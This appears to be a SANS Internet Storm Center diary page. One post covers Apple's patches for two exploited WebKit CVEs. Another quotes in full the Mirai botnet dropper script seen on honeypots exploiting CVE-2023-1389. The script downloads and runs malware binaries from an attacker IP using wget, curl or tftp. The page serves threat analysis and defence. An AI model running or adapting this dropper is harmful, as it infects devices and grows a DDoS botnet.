Apple Patches Exploited WebKit Vulnerabilitiues in iOS/iPadOS/macOS

    Published: 2023-11-30
    Last Updated: 2023-11-30 18:48:28 UTC
    by Johannes Ullrich (Version: 1)
    0 comment(s)

    Apple today released patches for two WebKit vulnerabilities affecting macOS, iPadOS and iOS. I would expect standalone Safari updates for older macOS versions in the future. At this point, only the most recent operating system versions received patches.

    The vulnerabilities have been exploited against versions of iOS before 16.7.1. iOS 16.7.2 is the latest iOS 16 release, released in late October. It is not clear if it is vulnerable. Apple just states which versions were successfully exploited. 

    iOS 17.1.2 and iPadOS 17.1.2 macOS Sonoma 14.1.2
    CVE-2023-42916 [moderate] WebKit
    An out-of-bounds read was addressed with improved input validation.
     Processing web content may disclose sensitive information. Apple is aware of a report that this issue may have been exploited against versions of iOS before iOS 16.7.1.
    x x
    CVE-2023-42917 [critical] WebKit
    A memory corruption vulnerability was addressed with improved locking.
     Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited against versions of iOS before iOS 16.7.1.
    x x

     

     

    ---
    Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
    Twitter|

    Keywords:
    0 comment(s)

    Prophetic Post by Intern on CVE-2023-1389 Foreshadows Mirai Botnet Expansion Today

    Published: 2023-11-30
    Last Updated: 2023-11-30 03:34:23 UTC
    by John Bambenek (Version: 1)
    0 comment(s)

    Last week, Jonah Latimer posted here about traffic he saw to his own EC2 web honeypot exploiting CVE-2023-1389. I found this looking at new URL strings to our honepot network, and so for on 29 Nov 23, there have been about 300 detections for this vulnerability pulling a shell script from 45.95.146.26 a quick little shell script that does little more than figure out the architecture of the victim device and then attempt to download a architecture-specific variant of Mirai.

    binarys="mips mpsl x86 arm arm5 arm6 arm7 sh4 ppc arc"
    server_ip="45.95.146.26"\
    binout="system"
    exec="your device just got infected to a bootnoot"
    rm -rf $binout
    for arch in $binarys
      do
        rm -rf $arch
        cd /tmp || cd /var || cd /dev; wget http://$server_ip/g/$arch -O $binout || curl -O $binout http://$server_ip/g/$arch || tftp -g -l $binout -r $arch $server_ip
        chmod 777 $binout
        status=`./$binout $1`
        if [ "$status" = "$exec" ]; then
            rm -rf $binout
            break
        fi
        rm -rf $binout
      done

    The same IP hosted those binaries which were first seen on Virustotal on 24 November 2023 (See the ARM version report on VT here).

    If you take a look at our own data and generalize the exploit (example here) you see one spike in August and roughly small "noise level" exploitation and then today which so far has surpassed all our previous observation of exploit activity.

    The mitigation advice is the same, these devices probably shouldn't have internet facing admin panels but unfortunately the class of device suggests the people running them are also not likely reading such guidance much less have the ability or wherewithall to fix the issue and/or update their firmware.

    It should be pointed out that in the current environment of heightened geopolitical activity, DDoS is often the first lever used by individuals who want to project that same conflict online which makes the expansion of Mirai that much more concerning.

    --
    John Bambenek
    bambenek \at\ gmail /dot/ com
    Bambenek Labs - Well Fed Intelligence

    Keywords: cve20231389 honeypot mirai tplink
    0 comment(s)
    ISC Stormcast For Thursday, November 30th, 2023 https://isc.sans.edu/podcastdetail/8758

      Comments

      Login here to join the discussion.


      Diary Archives